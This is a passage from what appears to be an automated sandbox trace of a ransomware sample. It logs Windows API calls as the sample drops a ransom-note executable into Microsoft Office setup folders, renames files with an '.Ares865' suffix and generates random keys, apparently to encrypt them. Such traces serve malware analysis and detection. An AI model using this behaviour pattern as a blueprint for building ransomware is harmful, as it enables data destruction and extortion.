pbBuffer=0x2e2d2c8) returned 1 [0076.122] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.124] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.125] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.125] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.125] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en" [0076.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31f148 | out: hHeap=0x2b0000) returned 1 [0076.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0076.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned 88 [0076.125] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en" [0076.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.130] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99177d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5ee1e940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ee1e940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.130] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.130] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.Ares865") returned 106 [0076.130] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.ares865"), dwFlags=0x1) returned 1 [0076.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.131] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1347) returned 1 [0076.131] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.132] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.132] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.134] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.135] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.135] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.136] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us" [0076.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319540 | out: hHeap=0x2b0000) returned 1 [0076.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0076.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned 93 [0076.136] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us" [0076.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.142] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.142] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5ee44aa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ee44aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.142] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.142] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.143] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.Ares865") returned 116 [0076.143] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.144] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1452) returned 1 [0076.144] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.144] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.144] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.149] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.149] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.149] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.150] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.Ares865") returned 111 [0076.150] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.152] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1872) returned 1 [0076.152] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.152] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.153] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.154] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.155] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.155] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.156] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR" [0076.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0076.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0076.156] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned 87 [0076.156] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR" [0076.156] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.156] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.162] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x5ee6ac00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ee6ac00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.162] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.162] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.163] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.Ares865") returned 109 [0076.163] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.ares865"), dwFlags=0x1) returned 1 [0076.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6421) returned 1 [0076.164] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.164] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.164] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.167] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.168] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.168] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.168] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.Ares865") returned 105 [0076.168] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16683) returned 1 [0076.171] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.172] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.172] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.174] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.175] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.175] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.176] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us" [0076.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0076.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0076.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned 96 [0076.176] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us" [0076.176] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.176] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.183] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.183] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ee90d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ee90d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.183] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.183] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.183] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.Ares865") returned 122 [0076.183] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.184] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1450) returned 1 [0076.184] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0076.186] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.186] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.188] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0076.189] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.189] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0076.189] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.Ares865") returned 114 [0076.189] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.216] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.216] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1886) returned 1 [0076.217] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.217] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.217] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.220] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.220] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.220] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.221] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us" [0076.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319478 | out: hHeap=0x2b0000) returned 1 [0076.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0076.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned 93 [0076.221] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us" [0076.221] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.221] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to 